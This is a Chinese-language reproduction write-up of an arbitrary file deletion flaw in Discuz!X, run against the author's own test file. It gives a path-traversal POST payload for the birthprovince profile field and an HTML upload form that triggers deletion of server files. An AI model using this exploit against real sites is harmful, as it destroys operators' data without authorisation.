Discuz!X前台任意文件删除漏洞

复现过程，首先我们在服务器端创建一个文件作为删除目标

把这个test.txt作为我们要删除的目标

然后进论坛，注册一个账号

登陆看一下个人资料的页面构造一个payload

home.php?mod=spacecp&ac=profile&op=basePOST birthprovince=../../../test.txt&profilesubmit=1&formhash=xxxxxx其中formhash为用户hash这个formhash在源代码里直接搜就可以搜到，每个人账户的都是不同的，记住这个，后面会用到然后用hackbar构造一下点击execute，这里成功后我们可以看到，我们改的这个出生地的参数已经变成了这样OK，现在已经修改成功下面我们只需要构造一个上传点，上传一张图片就可以我写了个执行该服务器的php，直接访问就可以
<form  
action="http://你的服务器IP/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovi  
nce]=aaaaaa" method="POST" enctype="multipart/form-data">  
<input type="file" name="birthprovince" id="file" />  
<input type="text" name="formhash" value="f6a1381a"/></p>  
<input type="text" name="profilesubmit" value="1"/></p>  
<input type="submit" value="Submit" />  
</from>  
上传任意图片

记得这里传自己的formhash

然后submit

再去服务器端看一下，test.txt就已经被成功删除了